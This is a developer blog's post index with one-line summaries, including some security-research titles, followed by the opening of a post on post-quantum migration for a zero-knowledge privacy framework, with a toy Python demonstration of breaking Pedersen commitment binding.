# Skill Issue Dev | Dax the Dev

> I'm a Nuclear Engineer turned Software Engineer. I'm passionate about learning and sharing my knowledge with others. I'm currently working on a few projects and I'm always looking for new opportunities to learn and grow.

## Posts

- [The post-quantum migration path: lattice commitments, STARK wrapping, isogeny credentials](https://blog.skill-issue.dev/blog/post_quantum_relayerless_path/): Series finale. Shor's algorithm breaks every elliptic-curve assumption F_RP currently rests on. The migration: lattice polynomial commitments (Brakedown/Orion), hash-based STARKs as universal backend, isogeny group actions for credentials.
- [MEV resistance: why UPEE is sandwich-proof by construction](https://blog.skill-issue.dev/blog/mev_resistance_in_private_execution/): Theorem 7.3 — UPEE transactions resist sandwich/frontrun/liquidation MEV by construction. Theorem 7.4 — block MEV bounded by public-bit leakage, not transaction value. Independent of V, not super-linear.
- [F_RP vs Zcash, Tornado, RAILGUN, Aztec, Penumbra, Aleo, Namada, Monero](https://blog.skill-issue.dev/blog/f_rp_vs_existing_privacy_systems/): F_RP vs nine deployed privacy systems on the four axes that matter: relayer-free, Turing-complete, on-chain verifiable on a high-perf L1, low-trust setup.
- [Fitting F_RP in 656 bytes on Solana](https://blog.skill-issue.dev/blog/solana_instantiation_656_bytes/): Concrete F_RP instantiation on Solana. Groth16 over BN254, Poseidon Merkle, indexed nullifier tree, BN254 Pedersen, transaction in 656 of 1,232 bytes, 235K of 1.4M CU.
- [UPEE: composing SPST + PPST + TAB into one framework](https://blog.skill-issue.dev/blog/upee_universal_private_execution/): F_RP Construction IV. The five-algorithm tuple Setup/Deploy/Invoke/Verify/Finalize plus the simulation-based privacy theorem (3.12) and self-sovereignty theorem (3.13). The composition that makes the whole thing deployable.
- [Bayer-Groth verifiable shuffles for network-layer privacy](https://blog.skill-issue.dev/blog/verifiable_shuffles_for_privacy/): F_RP Construction III, Approach C. Bayer-Groth verifiable shuffles obscure the input→output permutation of a batch with O(√n) proof size — used to cascade-mix pre-broadcast batches at the network layer.
- [TAB: hiding the submitter with ring signatures and FROST](https://blog.skill-issue.dev/blog/tab_threshold_anonymous_broadcast/): F_RP Construction III. ZK proofs hide the contents but the wrapping Solana tx still leaks the submitter pubkey. TAB closes that gap with a Fujisaki-Suzuki ring signature and a FROST threshold Schnorr over Ed25519.
- [On the death of the trusted setup](https://blog.skill-issue.dev/blog/on_the_death_of_the_trusted_setup/): Universal SRS, transparent FRI, and why Groth16's per-circuit ceremony feels anachronistic in 2026 — even when, as ZERA does, you're still using one. A history of the ceremonies that worked, the ones that didn't, and what comes next.
- [WASM-native proving for ZK SDKs: an SDK author's take](https://blog.skill-issue.dev/blog/wasm_native_proving_sdk_authors_take/): Why zera-sdk ships native Rust on Node and snarkjs in the browser — and what it would actually cost to ship a WASM-compiled Rust prover for the browser path. A design post about the dual-target build pipeline.
- [Plonky3, the small-fast-cheap revolution](https://blog.skill-issue.dev/blog/plonky3_small_fast_cheap/): Why plonky3 — small fields, FRI commitments, no trusted setup — is the proof system to watch in 2026. The Mersenne31 / BabyBear / Goldilocks landscape, the FRI folding step, and why your laptop is suddenly a viable prover.
- [Recursive proof composition without the abyss: Halo to Nova](https://blog.skill-issue.dev/blog/recursive_proofs_halo_to_nova/): The path from Halo's accumulation scheme to Nova's folding scheme, derived from the recurrence relation. Where Halo2, Nova, SuperNova, and HyperNova actually differ, and which one to reach for in 2026.
- [PPST: extending SPST to arbitrary private computation](https://blog.skill-issue.dev/blog/ppst_private_programmable_state/): F_RP Construction II. Generalises SPST to private programmable state: arbitrary arithmetic circuits over committed pre/post-state, with R1CS-embedded program execution and atomic PPST-SPST composition.
- [Halo2 in 2026: what changed since the Zcash era](https://blog.skill-issue.dev/blog/halo2_in_2026_what_changed/): A survey of the Halo2 ecosystem six years after the Zcash team published it — what stayed the same (PLONKish, lookups, IPA), what evolved (KZG, gadget libraries, fork landscape), and what we ship today.
- [From sailor to CEO in three acts](https://blog.skill-issue.dev/blog/sailor_to_ceo_three_acts/): A short memoir of a strange decade — Navy reactor compartments, a bitcoin mine, ConsenSys-USAA-PMG, and the arc that ended at Zera Labs. The interesting question is not how I got here. It is where everyone else is going.
- [SPST: a self-paying shielded transaction model](https://blog.skill-issue.dev/blog/spst_self_paying_shielded_transactions/): First construction in F_RP. The SPST relation, balance conservation under DLOG, double-spend resistance under collision-resistant PRF, unlinkability under DDH, simulation-extractable non-malleability.
- [Circom, by example](https://blog.skill-issue.dev/blog/circom_by_example/): A DSL primer told through one circuit — proving knowledge of a Poseidon pre-image. Every Circom keyword annotated as it appears, the constraint graph drawn out, and the R1CS fall-through to a witness.
- [Proving in the browser, by the numbers](https://blog.skill-issue.dev/blog/proving_in_the_browser_by_the_numbers/): What is actually feasible inside a browser tab in 2026 — Groth16 prover times for Poseidon, Range, and Merkle circuits, the WASM threading story, and where the main thread stops being a viable home for your prover.
- [Merkle inclusion proofs over compressed account state on Solana](https://blog.skill-issue.dev/blog/merkle_inclusion_compressed_solana/): How a 32-byte hash and a logarithmic path replace a multi-kilobyte account. Walk the tree-height math, the Light Protocol compressed-account model, and an inclusion-proof construction you can run in Node.
- [The fee paradox: why every smart-contract privacy mixer needs a relayer](https://blog.skill-issue.dev/blog/the_fee_paradox/): On account-model chains the very act of paying a transaction fee deanonymises the recipient. This post formalises the paradox, walks through three resolutions, and sets up the SPST construction that resolves it inside the ZK proof itself.
- [Relayerless privacy on a Turing-complete L1: an intro to F_RP](https://blog.skill-issue.dev/blog/relayerless_privacy_intro/): A series-opening map of the relayerless full-privacy framework I've been writing up. Five cryptographic games, four constructions (SPST, PPST, TAB, UPEE), one main theorem — and why it matters that the target chain is Solana.
- [Cross-compiling vantad for darwin: Apple Silicon, sign + notarise](https://blog.skill-issue.dev/blog/vanta_darwin_apple_silicon_build/): Shipping vantad as a notarised Mac binary inside a Tauri app meant fixing libconsensus link order, building Rust release with the right target triple, signing every sidecar, and stapling the DMG separately. The notes from the trenches.
- [Vanta Desktop: a Tauri wallet that ships its own full node](https://blog.skill-issue.dev/blog/vanta_desktop_tauri_wallet/): Most desktop wallets are thin RPC clients that talk to somebody else's node. The Vanta desktop app spawns vantad and the L2 sidecar as Tauri sidecar binaries, owns their PIDs, and adopts orphans on restart. Here is how that came together.
- [The vanta sidecar: how a Rust ZK indexer talks to a C++ Bitcoin node](https://blog.skill-issue.dev/blog/vanta_sidecar_architecture/): vantad is C++. The ZK index is Rust. They cooperate over RPC and a REST API, with the C++ verifier linked statically through libvanta_verifier.a. Here is the audit-surface trade we made and what the sidecar actually does.
- [Why we shipped SP1 instead of RISC Zero](https://blog.skill-issue.dev/blog/vanta_sp1_zkvm_circuits/): Vanta's earliest design notes said 'RISC Zero zkVM.' Production ships SP1 + Plonky3. The swap was cheap because the privacy protocol is independent of the prover. Here is why we moved, what stayed the same, and what the FFI verifier looks like.
- [Tauri 2.x sidecars in anger: the ergonomics paper-cuts I had to fix](https://blog.skill-issue.dev/blog/vanta_tauri_ergonomics/): externalBin wants a target-triple suffix nobody documents loudly enough. The dev resolver walks up parents. Startup must be sequenced. The setup-sidecars.sh + resolve_binary() story for shipping a wallet that runs its own node.
- [Vanta: a Bitcoin fork with ZK at consensus](https://blog.skill-issue.dev/blog/vanta_zk_privacy_l1/): 42 billion supply. 1-minute blocks. RISC Zero proofs verified at consensus. The opinionated answer to 'why fork Bitcoin in 2026?' is that you're not really forking Bitcoin — you're shipping a different L1 that has Bitcoin's surface area.
- [Poseidon, by hand and by code](https://blog.skill-issue.dev/blog/poseidon_by_hand_and_by_code/): Why one of the cheapest hashes in zero-knowledge cryptography also has the strangest insides. Derive the S-box, count the constraints, and run a 30-line implementation in the browser.
- [Stuck Sell, Post-Graduation: Fixing a Trapped-Funds Bug Without a Redeploy](https://blog.skill-issue.dev/blog/stuck_sell_post_grad/): A graduated launchpad token left users unable to sell. Fix shipped without redeploying the program: a frontend conversion path that withdraws SPL, compresses, then sells through the AMM.
- [Being CEO and still shipping code](https://blog.skill-issue.dev/blog/being_ceo_and_still_shipping_code/): The CTO-vs-CEO false dichotomy, why I still review every PR that touches the SDK core, and how I use Claude Code plus an MCP server over my own writing to keep technical leverage as the company grows.
- [btc-tunnel.sh: SSH-jumping into a remote bitcoind for swap testing](https://blog.skill-issue.dev/blog/vanta_btc_tunnel_dev_environment/): Three small bash scripts wire the desktop dev environment to a real mainnet bitcoind for atomic-swap testing. Tunneling, RPC wrapping, and an address watcher with auto-reconnect — and why exposing 8332 to the internet is a worse idea than you think.
- [Block explorers for privacy chains: a Rust indexer for vanta](https://blog.skill-issue.dev/blog/vanta_explorer_rust_indexer/): Patching btc-rpc-explorer got us to 'works.' Then we wrote vanta-explorer in Rust + React: an Axum backend, SQLite indexer, and a SPA that renders shielded transfers as opaque commitments without lying about what it knows.
- [iroh in production: encrypted-note gossip on a 1-minute-block chain](https://blog.skill-issue.dev/blog/vanta_iroh_gossip_in_production/): Why vanta-node uses iroh-gossip for L2 P2P instead of libp2p, what the topic + ALPN setup actually looks like, the GossipMessage shape, and the saturating-decrement bug that taught me an event ordering lesson.
- [L1 nullifier sets: enforcing no-double-spend at consensus](https://blog.skill-issue.dev/blog/vanta_l1_nullifier_set/): Most privacy chains track spent notes in a wallet-side index and pray. Vanta puts the nullifier set in chainstate and lets the consensus rules do the praying. Here's why that line moved, and what it costs.
- [What's in vanta/papers — reading 17 design docs in 2026](https://blog.skill-issue.dev/blog/vanta_papers_design_doc_tour/): Vanta ships its whitepaper as 17 markdown files in the repo, not a PDF on a marketing page. This is the tour: what each doc covers, which one has the wording bug, and why the docs live next to the code.
- [Private atomic swaps and the price-discovery problem](https://blog.skill-issue.dev/blog/vanta_private_atomic_swaps/): BTC ↔ VANTA atomic swaps via HTLC are the easy part. If the VANTA leg is shielded, no observer can compute the rate, and no rate means no public price. Walking through six designs and the hybrid recommendation in vanta/planning.
- [BIP-199 by hand: a code walk through vanta-swap](https://blog.skill-issue.dev/blog/vanta_swap_htlc_walkthrough/): A line-by-line tour of the Rust HTLC state machine that drives BTC ↔ VANTA atomic swaps. Redeem script bytes, the 2x/1x timelock dance, BIP143 sighash binding, and the witness layout that makes refund and claim routes provably distinct.
- [The unified dashboard: collapsing private and transparent into one wallet view](https://blog.skill-issue.dev/blog/vanta_unified_dashboard_wallet_ui/): Two pages — one for private balance, one for transparent — taught users to think in two heads. The 2026-04-17 commit folded them. The wallet now shows one balance, one feed, with the privacy boundary inside the data, not the URL.
- [The vanta wallet HTTP API: an Axum bridge to vantad RPC](https://blog.skill-issue.dev/blog/vanta_wallet_axum_api/): Before the Tauri desktop wallet there was an Axum web wallet. It is a five-route Rust service that wraps vantad's JSON-RPC and serves a single static page. Boring on purpose — and the boring is the point.
- [Stratum v1, the from-scratch Python version](https://blog.skill-issue.dev/blog/vanta_stratum_python_pool/): Solo mining Vanta requires a Stratum server. Public-pool is fine for normal chains; mandatory privacy pushes the pool toward shielded coinbases, encrypted-note submission, and an L2 retry queue. pool/stratum_server.py does it all in stdlib Python.
- [Mining VANTA with a Bitaxe BM1368](https://blog.skill-issue.dev/blog/mining_vanta_with_a_bitaxe/): A 350 GH/s, ~12 W open-hardware ASIC plugged into a Stratum server I wrote against my own L1. Solo mining isn't economic on Bitcoin in 2026. On a 1-minute-block fork with 100k subsidy, the math changes.
- [Why BN254, and when to switch off it](https://blog.skill-issue.dev/blog/why_bn254_and_when_to_switch/): BN254 is the default curve for production ZK in 2026. The 128-bit security claim is no longer 128 bits, and BLS12-381 is gaining ground. Here is the math, the deployment reality, and the migration path.
- [Privacy's broadband moment](https://blog.skill-issue.dev/blog/privacys_broadband_moment/): ZK got fast, hardware got attestable, AI agents started carrying their own wallets, and regulators stopped trying to ban math. Four curves crossed and privacy stopped being a research topic — it became infrastructure.
- [Generating mempool with a Rust txbot](https://blog.skill-issue.dev/blog/vanta_txbot_synthetic_mempool/): Empty blocks lie. A new chain whose miners are mining empty templates is not exercising any of the code that fails in production. The txbot is a 200-line Rust loop that round-robins coins through 114 addresses to keep mempool honest.
- [Latitude bare-metal primary, Fly.io backup: the deploy story for a 1-min-block chain](https://blog.skill-issue.dev/blog/vanta_flytoml_latitude_baremetal/): Vanta v1 went LIVE on a Latitude bare-metal box at 64.34.82.145:9333 with a Fly.io seed fleet as auto-failover. Why a 1-min-block chain hates cold starts, what the fly.toml has to say about it, and the cost math that picks bare metal.
- [The MCP server inside zera-sdk](https://blog.skill-issue.dev/blog/mcp_server_inside_zera_sdk/): Most SDKs ship as a library. zera-sdk also ships as a Model Context Protocol server. Here is why an AI agent should be able to call shielded-pool primitives directly, and how we keep that interface from becoming a footgun.
- [Range proofs in 80 lines: Pedersen commitments and a tiny Bulletproof](https://blog.skill-issue.dev/blog/range_proofs_in_80_lines/): How a Bulletproof actually compresses a range proof to logarithmic size. Derive the inner-product argument from scratch, run a toy prover/verifier in the browser, and pick the right range-proof primitive for 2026.
- [Nullifiers without the witchcraft](https://blog.skill-issue.dev/blog/nullifiers_without_witchcraft/): Nullifier Generation is on the ZERA front page next to Pedersen Commitments and Zero-Knowledge Proofs. The Rust + TypeScript implementations are six lines apiece. Here is what they actually do, and why the design borrows from Zcash.
- [Pedersen commitments, in production](https://blog.skill-issue.dev/blog/pedersen_commitments_in_production/): ZERA marketing says "Pedersen Commitments" on the cryptography page. The SDK ships Poseidon. Both are right — and the gap between them is the whole story of what shipping ZK in 2026 actually looks like.
- [144 Tests and a Surfpool Devnet](https://blog.skill-issue.dev/blog/zera_sdk_test_suite/): How the Zera SDK got from "scaffolded" to "trustable" — a 144-test Vitest suite, a Surfpool-forked devnet running on a Latitude box, and a quickstart that actually works.
- [Building the ZERA Wallet for desktop, iOS, and Android](https://blog.skill-issue.dev/blog/zera_wallet_three_platforms/): Three platforms, one shielded pool, one design system. The trade-offs of building a wallet that has to feel like cash on a phone, like a tool on a laptop, and the same on both.
- [Zera Wallet v3: ZK Proofs in a Tauri Webview](https://blog.skill-issue.dev/blog/zera_wallet_v3_zkp/): A Tauri 2 desktop wallet that proves Groth16 in the browser, persists encrypted notes locally, talks NFC to physical bearer cards, and never lets the private key out of Rust.
- [x402 Vector 2: partial-signing instruction injection](https://blog.skill-issue.dev/blog/x402_partial_signing_injection/): The x402 client builds and partially signs the entire VersionedTransaction. A facilitator that validates structure but not bytes can co-sign a tx with extra clawback / drain instructions appended after the legitimate transfer.
- [x402 Vector 1: settlement race condition](https://blog.skill-issue.dev/blog/x402_settlement_race_condition/): Coinbase x402's verify→settle pipeline isn't atomic. A client can submit the same PAYMENT-SIGNATURE to multiple facilitators in parallel, or race the facilitator with a direct on-chain submission. Double-spend within blockhash validity (~60s).
- [x402 Vector 3: facilitator gas drain](https://blog.skill-issue.dev/blog/x402_facilitator_gas_drain/): x402 facilitators pay all transaction fees and the spec defines no per-client rate limit. A flood of valid-looking transactions that fail at maximum compute-unit consumption is a per-request economic attack on the facilitator.
- [SOLMAL: the x402 attack surface (series intro)](https://blog.skill-issue.dev/blog/x402_attack_surface_intro/): Mapping the attack surface of Coinbase's x402 micropayment protocol on Solana. Series intro covering the verify→settle pipeline, the actor model, the 9 vectors, and the responsible-disclosure timeline.
- [Building the Zera SDK: Day One](https://blog.skill-issue.dev/blog/zera_sdk_scaffolding/): Sixteen commits in fourteen minutes. The first day of the @zera-labs/sdk monorepo — Rust core via neon-rs, TypeScript scaffolding, Poseidon, Merkle trees, ZK provers, and an MCP server for AI agents.
- [Cruiser: A Tauri Hookup App on iroh, Geohash-Bucketed Presence, and Why P2P Dating Is Actually Fine](https://blog.skill-issue.dev/blog/cruiser_iroh_gossip_p2p/): A Tauri 2 + React + iroh-gossip dating app where peers find each other by geohash, broadcast presence on a topic-per-bucket, and DM each other with consent signals — all without a central server. The architecture is the product.
- [Why I started Zera Labs](https://blog.skill-issue.dev/blog/why_i_started_zera_labs/): Three things became true in the same year — ZK got fast enough, Solana got cheap enough, and AI agents needed verifiable money. Sitting at the intersection felt like a ship date, not a thesis.
- [Prediction Markets, LP Locks, and an Admin Page That Doesn’t Suck](https://blog.skill-issue.dev/blog/prediction_markets_admin/): How I bolted CPMM prediction markets onto ZeraSwap, locked LP for graduated tokens, and built a 5-tab admin panel before the first malicious actor showed up.
- [Five Commits to Get an OG Image Out of a Cloudflare Worker](https://blog.skill-issue.dev/blog/og_pngs_cf_workers/): A 24-minute slog where I got dynamic OG PNG generation to work on Cloudflare Pages Functions. The bug is WebAssembly. The fix is a build-time WASM import.
- [ZeraSwap: An AMM for Compressed Tokens](https://blog.skill-issue.dev/blog/zeraswap_compressed_amm/): Initial commit of the first compressed-token AMM on Solana — Anchor program, x*y=k math, SOL/cToken pairs, and the cyberpunk launchpad UI that grew up around it.
- [ZK-FHIR: A Medical Demo That Doesn’t Leak Patients](https://blog.skill-issue.dev/blog/zera_med_zk_fhir/): Building a RISC Zero zkVM gateway for FHIR-shaped medical records — proofs over private patient data, zero-knowledge insurance claims, and HIV/STI compartmentalization.
- [A Privacy Demo That Works on a Phone: Mobile Drawer, HUD Offsets, and Real Breach Data](https://blog.skill-issue.dev/blog/zera_med_responsive_hud/): Bolting a mobile drawer onto the Zera Med ZK-FHIR demo without breaking the desktop sidebar, fixing AnimatePresence warnings, and updating PrivacyChallenge with 2024-2025 breach data.
- [Zera Janitor: Closing Solana Dust Accounts in Leptos WASM](https://blog.skill-issue.dev/blog/zera_janitor_leptos_wasm/): A Solana program + Leptos 0.7 frontend that scans your wallet for empty SPL token accounts, batches up to 25 closes per transaction via CPI, and pays you back 95% of the rent. The fee path is the actual interesting part.
- [Rebranding to m0n3y and Writing Crypto Docs Like You're 10](https://blog.skill-issue.dev/blog/m0n3y_eli5_rebrand/): The DAXSO → M0N3Y rebrand commit, the burn-to-earn explainer for degens, and an ELI10 walk-through of zk-shielded notes that does not mention the word "circuit" once.
- [Empowering Local Crypto Advocacy](https://blog.skill-issue.dev/blog/congress_crypto/):
- [m0n3y: Naming a Dream](https://blog.skill-issue.dev/blog/m0n3y_naming_a_dream/): The docs site that came before the code. Looking back at the m0n3y-web init commit and the voting proposal that was supposed to fix DAO whales.
- [TW-TVV: Why Token-Quantity Voting Is Broken, and the Math I Tried to Fix It With](https://blog.skill-issue.dev/blog/m0n3y_tw_tvv_governance/): A full walk-through of the Time-Weighted Tiered Value Voting proposal I drafted for $M0N3Y in 2025. Five tiers, time multipliers, log-scaled volume, and why every variable in the formula is a knob fighting a different attack.
- [Building A Better Cryptocurrency: What We Should Have Done](https://blog.skill-issue.dev/blog/a_better_crypto/): A technical proposal for a truly decentralized digital cash system
- [Listening to the Bluesky Firehose for Accidental Haikus](https://blog.skill-issue.dev/blog/bsky_haiku_firehose/): A Rust firehose listener that decodes ATProto CAR frames live, runs whatlang + syllarust on every English post, and saves the ones that scan as 5-7-5 haikus to disk. There were a lot of haikus.
- [You are thinking about AI wrong.](https://blog.skill-issue.dev/blog/rethink_ai/): We have had how many decades of Science Fiction to prepare us for the future of AI, and yet we are still thinking about it wrong.
- [Rusty Pipes Exploit](https://blog.skill-issue.dev/blog/rusty_pipes_exp/): Using Rust to inject malicious code into npm packages. And hijack your entire node runtime.
- [Youtube Wasting Money on Fake Livestreams](https://blog.skill-issue.dev/blog/ways_to_burn_money_at_google/): One of the biggest ways YouTube is wasting its money is promoting scam and spam prerecorded livestreams.
- [Hungry Git: A Quick Guide to Hacking Orgs and Bots](https://blog.skill-issue.dev/blog/hacking_bots/): Recently more and more people are talking about how insecure GitHub is. This article will show you how to exploit GitHub organizations and bots to get what you want.
- [What running a Bitcoin mine taught me about cloud margins](https://blog.skill-issue.dev/blog/what_running_a_bitcoin_mine_taught_me/): A short stint at Foundry Digital running ASIC fleets, immersion vs. air, the depreciation curve, and the brutal arithmetic of difficulty adjustments — and why I never stopped thinking like an operator after I went back to writing software.
- [Nuclear reactors taught me to ship software](https://blog.skill-issue.dev/blog/nuclear_reactors_taught_me_to_ship/): Watchstanding, casualty drills, and pre-task briefs map onto code review, on-call, and disaster recovery more cleanly than any management book I have ever read.
- [process-thing: An LSB Watermarker for upload-thing, Written in Rust via Neon](https://blog.skill-issue.dev/blog/process_thing_lsb_watermark/): A Rust npm package that embeds invisible watermarks in the least significant bit of every red channel pixel. Built for upload-thing image preprocessing. Cross-compiled for 7 platforms. The README is one paragraph.
- [Rust in Peace: How to Hijack Node.js with a Single Require](https://blog.skill-issue.dev/blog/rusty_pipes_building_supply_chain_malware_for_npm/): Discover how to exploit the Node.js ecosystem with Rust-based supply chain malware. Learn about the vulnerabilities in npm packages and how a single require line can compromise JavaScript projects. Explore security measures to prevent such attacks.
- [The Difference Between Publishers and Developers](https://blog.skill-issue.dev/blog/skg_fixes/): A lot of the time, when gamers have a problem they blame the developers. But who are they really mad at? Time to take a breath and actually learn who is doing what to whom and how often.
- [Stop Killing Games: A Pricing Thought Experiment](https://blog.skill-issue.dev/blog/stop_killing_games_a_pricing_thought_experiment/): After talking with industry and business professionals, a very interesting expectation of what will happen was put forward.
- [The Flaws of the #StopKillingGames Initiative: A Developer’s Perspective](https://blog.skill-issue.dev/blog/stop_killing_games/): Surprise, I am not a fan of the Stop Killing Games initiative. It is a flawed approach to addressing the issues in the gaming industry. Let me explain why.
- [Origins of Foo and Bar](https://blog.skill-issue.dev/blog/origins_of_foo_and_bar/): Foo and Bar: where did they come from?
- [What is RISC V](https://blog.skill-issue.dev/blog/what_is_risc_v/): What is RISC-V, why is it so cool, and why is it so important?
- [Embedded AI](https://blog.skill-issue.dev/blog/embedded_ai/): Unlocking the potential of the Milk-V Duo with embedded AI and Linux-based interrupt handling
- [Rusty Pipes](https://blog.skill-issue.dev/blog/rusty_pipes/): An npm supply chain exploit that checks which packages you contribute to, then injects a malicious Rust binary into the next release.
- [Developers in the Job Market](https://blog.skill-issue.dev/blog/developers_in_the_job_market/): Recent studies reveal an alarming increase in fake job postings. This article explores the economic implications of fake job postings and the challenges faced by job seekers in the current market.
- [Rust Type Abuse for Beginners](https://blog.skill-issue.dev/blog/rust_type_abuse_for_beginners/): Explore some simple type system abuse and hacks to get used to the Rust model and syntax of Types
- [Abusing Ts Type System](https://blog.skill-issue.dev/blog/abusing_ts_type_system/): Dive into the world of TypeScript and explore the fascinating `Exclude` utility type.
- [Introducing the Milk V](https://blog.skill-issue.dev/blog/introducing_milkv/): Milk-V Duo is an ultra-compact embedded development platform. It can run Linux and RTOS, providing a reliable, low-cost, and high-performance platform for professionals, industrial ODMs, AIoT enthusiasts, DIY hobbyists, and creators.
- [Nix-flakes and Bun](https://blog.skill-issue.dev/blog/nixos_bunjs/): Small update to my development flow and focus. How to get up and running with Bun.js in NixOS.
- [How Random is a Local LLM? A Rust Benchmark with Redis](https://blog.skill-issue.dev/blog/ai37_llm_random_numbers/): A Rust harness that asks Ollama models for "a random number between 1 and 100" thousands of times, parses every response with regex, stores results in Redis, and pits them against a real RNG. Spoiler: 42 wins.
- [Blazingly Fast Drinks: A Repo I Made For The Bit](https://blog.skill-issue.dev/blog/glug_blazingly_fast_drinks/): A Clerk + Next.js + Expo turborepo I called "glug" with the description "Blazingly Fast Drinks". The README never mentioned drinks. The repo description carried the entire joke.

## About

- [About Dax the Dev](https://blog.skill-issue.dev/about)

---

# The post-quantum migration path: lattice commitments, STARK wrapping, isogeny credentials

Canonical: https://blog.skill-issue.dev/blog/post_quantum_relayerless_path/
Description: Series finale. Shor's algorithm breaks every elliptic-curve assumption F_RP currently rests on. The migration: lattice polynomial commitments (Brakedown/Orion), hash-based STARKs as universal backend, isogeny group actions for credentials.
Published: 2026-05-16T15:00:00.000Z
Tags: zk, post-quantum, lattice, stark, csidh, sqisign, phd

import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx";

The whole F_RP framework, as written today, is **completely broken by Shor's algorithm**. Every elliptic-curve assumption the construction rests on — DLOG on Curve25519, q-PKE on BN254, q-DLOG on the Pasta cycle — falls in polynomial time on a sufficiently large fault-tolerant quantum computer. Pedersen commitments lose binding. Groth16 loses soundness. Ed25519 signatures lose unforgeability. The entire stack is a pre-quantum house.

Today this is fine. NIST estimates a cryptographically-relevant quantum computer is still 10-20 years away. But "we'll fix it later" is exactly how we got into the SHA-1 / RSA-1024 / DES situation. The right time to design the migration path is **before** there's a deadline.
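To make "Pedersen commitments lose binding" concrete, here is a toy sketch. A brute-force discrete log stands in for Shor, and a 467-element group stands in for BN254; every number and name below is illustrative, not from the F_RP construction:

```python
# Why Pedersen binding dies with DLOG: once an attacker knows
# x = log_g(h), any commitment C = g^m * h^r can be reopened to ANY
# message m'. The brute-force loop below stands in for Shor's algorithm.
p, q = 467, 233          # toy group: p = 2q + 1, both prime
g, h = 4, 9              # two generators of the order-q subgroup of Z_p^*

def commit(m, r):
    """Pedersen commitment C = g^m * h^r mod p."""
    return (pow(g, m, p) * pow(h, r, p)) % p

# "Shor": recover x = log_g(h) (here by exhaustive search)
x = next(e for e in range(1, q) if pow(g, e, p) == h)

m, r = 42, 17
C = commit(m, r)

# Equivocate: find r2 opening the SAME commitment to a different message.
# From m2 + x*r2 = m + x*r (mod q):  r2 = r + (m - m2) * x^{-1} mod q
m2 = 99
r2 = (r + (m - m2) * pow(x, -1, q)) % q
assert commit(m2, r2) == C   # binding is gone
```

The same one-line algebra applies verbatim over BN254's 𝔾_1 once the discrete log of `h` is computable.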
This is post 11 of 11 in the [relayerless-privacy](/series/relayerless-privacy) series — the finale.

## What Shor breaks, in one paragraph

Shor's algorithm gives a quantum polynomial-time reduction from integer factoring and discrete log to period-finding. RSA, classical Diffie-Hellman, DSA, ECDSA, Ed25519, Schnorr signatures, BLS signatures, Pedersen commitments, pairings — every cryptographic primitive that relies on the hardness of DLOG or factoring is compromised.

For F_RP specifically, the four broken pieces:

1. **Groth16 over BN254.** q-PKE / q-DLOG → polynomial-time forgery.
2. **Pedersen commitments over BN254.** DLOG → binding broken; commitments become equivocable.
3. **Ed25519 signatures.** DLOG → forgery, including FROST threshold variants.
4. **CSIDH and other classical isogeny constructions.** Kuperberg's quantum sub-exponential algorithm threatens them more aggressively than classical attacks.

Hash-based primitives survive: SHA-2, SHA-3, Keccak, Poseidon (modulo round-by-round cryptanalysis). FRI / STARK proofs survive because they only depend on hash collision resistance, not on any algebraic structure. Lattice-based primitives (Module-LWE, Module-SIS) survive under best-known quantum attacks.

## The replacement stack

| Pre-quantum component | Broken by Shor | Post-quantum replacement | Cost |
|-----------------------|----------------|--------------------------|------|
| Groth16 (BN254) | Yes | STARK (FRI) inner + lattice-SNARK outer | 5-20 KB proof; ~300K CU |
| Pedersen (BN254 𝔾_1) | Yes | Lattice (Module-LWE) commitment | 4-50 KB |
| Ed25519 + FROST | Yes | SQIsign / lattice signatures | 200-2000 B sig |
| KZG (BN254 pairing) | Yes | FRI or Brakedown / Orion | O(log²n) hashes |
| Poseidon hash | No (classical and quantum CR) | Same; possibly Anemoi | unchanged |

Post-quantum F_RP is **5-20 KB per proof** instead of 128 bytes, **~300K CU on-chain** instead of ~150K, and **~5 KB per signature** instead of 64 bytes.
The framework still works; the costs grow ~50-100× on every dimension.

## Lattice-based polynomial commitments

The replacement for KZG is a polynomial commitment based on Module-LWE / Module-SIS. Two leading candidates:

### Brakedown (Golovnev, Lee, Setty, Thaler, Wahby — CRYPTO 2023)

Linear-time SNARK based on linear-code polynomial commitments. The prover commits to multilinear polynomials using a linear-time encodable error-correcting code, combined with the Spartan polynomial IOP.

- Prover: `O(N)` field operations for `N`-sized R1CS.
- Proof size: ~1.5 MB for `2^20` multiplication gates (before code-switching compression).
- Verification: linear in proof size.
- No trusted setup.
- Plausibly post-quantum secure (security from collision-resistant hashing + linear-code distance).

The **`O(√N)`** base proof size is the killer for Solana — even the 4,096-byte SIMD-0296 limit isn't enough for a raw Brakedown proof on a meaningful circuit.

### Orion (Xie, Zhang, Song — CRYPTO 2022)

`O(N)` prover time with `O(log²N)` proof size via **code-switching composition**. The code-switching mechanism reduces proof size from `O(√N)` to polylogarithmic by proving that the witness of a secondary zero-knowledge argument coincides with the message in a linear code. Numbers are still rough — ~10 KB proof for `2^20` constraints — but the trajectory is right. Orion is the most promising candidate for direct on-chain verification on Solana under SIMD-0296.

### Open problem 7.1 — lattice commitment size

Current lattice-based commitments produce opening proofs of size `O(k · d · log q)` bits, yielding 4-50 KB concretely. Determine tight lower bounds for 128-bit post-quantum security; characterise the feasibility space within Solana's tx limit.

## Hash-based STARKs as universal backend

STARKs are already post-quantum (security from collision-resistant hashing only).
The migration is simpler in shape but more expensive in proof size: - **FRI over Goldilocks field** ($p = 2^{64} - 2^{32} + 1$): efficient NTT, native to 64-bit hardware. Plonky3 uses this. - **FRI over M31 (Mersenne-31)**: SIMD-optimised arithmetic. StarkWare's Circle STARK construction uses M31. Proof size scaling: `O(λ · log²N)`. For `2^20` steps at 128-bit security, ~50-200 KB per proof. A **`400×`-`1600×` blowup** vs. Groth16's 128 bytes. Way over Solana's transaction limit. Three deployment paths: ### Path 1: STARK-in-Lattice-SNARK (Open Problem 7.2) Wrap the STARK verifier circuit inside a lattice-based SNARK to recover succinct on-chain verification. The STARK verifier circuit is `O(log²N)` hash evaluations + field operations. With Poseidon (~250 R1CS constraints per hash), `2^20`-step verification is `~100K` constraints. Recursive composition: $$ \pi_{\mathrm{outer}} \;=\; \mathsf{Prove}_{\mathrm{Lattice}}\bigl(\,\mathsf{Verify}_{\mathrm{STARK}}(\pi_{\mathrm{inner}}) = 1\,\bigr). $$ Estimated proof size: ~5-20 KB. **Marginal fit for SIMD-0296** (4,096-byte transactions). Open whether the lattice outer is small enough. ### Path 2: STARK aggregation (STARKPack) Aggregate `n` STARK proofs into a single argument that's $(1 + 1/n)$× the size of a single proof, with `~2×` faster verification. | n packed | Aggregated size | Per-proof verify CU | |----------|----------------|---------------------| | 1 | ~100 KB | 500K | | 10 | ~110 KB | 50K/proof | | 